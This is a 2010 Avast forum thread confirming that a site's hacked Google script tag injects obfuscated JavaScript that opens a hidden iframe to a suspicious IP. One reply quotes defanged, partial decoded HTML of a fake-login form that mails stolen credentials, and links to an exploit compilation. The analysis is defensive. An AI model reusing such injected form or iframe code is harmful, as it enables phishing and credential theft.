Author Topic: Nerdtests and Avast: Probably F/P?  (Read 8357 times)

0 Members and 1 Guest are viewing this topic.

Ruuga

  • Guest
Nerdtests and Avast: Probably F/P?
« on: July 07, 2010, 09:17:17 PM »
So today I tried to open this site but avast thinks there is a trojan. I'm using the Avast 5 but I didn't get the alarm when I was using version 4. Also Avast sends an alarm if you type the URL to the google. Also my friend said that he got an alert with Avast 5.
« Last Edit: July 09, 2010, 11:59:37 AM by igor »

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37506
  • Not a avast user
« Last Edit: July 07, 2010, 09:41:18 PM by Pondus »

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88897
  • No support PMs thanks
Re: Nerdtests and Avast: Probably F/P?
« Reply #2 on: July 07, 2010, 10:00:50 PM »
There appears to be one of the google script tags which has been hacked (2nd to last on the page code, see image1), inserting a long line of obfuscated javascript.

This script when decoded (image2) is creating a hidden iframe tag that tries to open an IP in the Ukraine and highly suspect.

So I believe that the detection is good.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Nerdtests and Avast: Probably F/P?
« Reply #3 on: July 08, 2010, 12:02:10 AM »
Hi DavidR,

And what does that long unescape string do? Well. that is hexadecimal coded javascript commands that are decoded according to lines as : <FORM METHOD="POST" ACTION="some address/form/mailto.cgi" ENCTYPE="x-wXw-form-urlencoded"> <INPUT TYPE="hidden" NAME="Mail_From" VALUE="wXwmalcreant*com"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Some Login Hacked! (by OUR INC`s Fake Login)"> <INPUT TYPE="hidden" NAME="Next_Page" VALUE="hxtp/etc. etc. ">
Another interesting explanation of the exploit: http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_exploits_interesantes_actualizando-t141915.30.html

polonus
« Last Edit: July 08, 2010, 12:08:47 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88897
  • No support PMs thanks
Re: Nerdtests and Avast: Probably F/P?
« Reply #4 on: July 08, 2010, 02:19:59 AM »
What it does is shown in the last image and what I said in the post (which seems to differs from your example), creates a hidden iframe and connects to an IP in the Ukraine. After that I don't care what it does, just that avast has in my mind done its job and blocked the insertion of an obfuscated script (JS:ScriptXE-inf [Trj])

Even if your explanation is right it is still a good detection by avast, I just don't go to any depth when I find what I consider is enough evidence to confirm a good detection.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67195
Re: Nerdtests and Avast: Probably F/P?
« Reply #5 on: July 13, 2010, 03:17:32 AM »
You've received a blog article.
Congratulations :)

http://blog.avast.com/2010/07/07/are-you-a-nerd/
The best things in life are free.

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88897
  • No support PMs thanks
Re: Nerdtests and Avast: Probably F/P?
« Reply #6 on: July 13, 2010, 05:03:16 AM »
Thanks for the notice Tech.

Yes, it is nice that the virus labs noticed it amongst all the other topics ;D
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security